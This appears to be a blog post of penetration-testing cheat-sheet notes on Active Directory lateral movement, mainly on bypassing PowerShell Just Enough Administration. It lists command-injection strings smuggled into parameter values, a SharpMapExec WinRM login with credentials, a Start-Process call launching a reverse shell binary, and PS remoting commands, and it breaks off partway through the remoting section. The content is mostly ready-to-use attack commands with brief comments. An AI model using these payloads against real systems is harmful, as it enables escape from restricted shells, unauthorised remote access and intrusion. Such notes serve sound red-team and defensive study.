Showing posts from December, 2020

AD PenTest - Lateral Movement & Persistence

Bypassing JEA

  #View all the commands that we have access to
  get-command *

  #View the command info (parameters and definition) of the commands/cmdlets
  Get-Command -ShowCommandInfo -Name CmdLet_NAME
  Get-Command -ShowCommandInfo -Name Get-ChildItem

  #Using SharpMapExec to bypass JEA or find interesting items
  .\SharpMapExec.exe ntlm winrm /user:USERNAME /password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10

Note: ExpandString & Invoke-Expression might be vulnerable to command execution.

  #Examples of bypassing JEA
  get-something -command 'Hello $([void] (Get-Item C:\))'
  get-something -command '$(""; ipconfig)'

  #If Full language mode is enabled
  function test() {whoami};test

  #Bypassing JEA if Start-Process is accessible
  Enter-PSSession -ComputerName <Name> -ConfigurationName <Name>
  Start-Process cmd.exe revshell.exe

Powershell Remote Access

  Enable-PSRemoting #uses TCP - port 5985, and 5986 for SSL.

  #Start a PS Session
  Enter-PSSession -ComputerName kurisu.st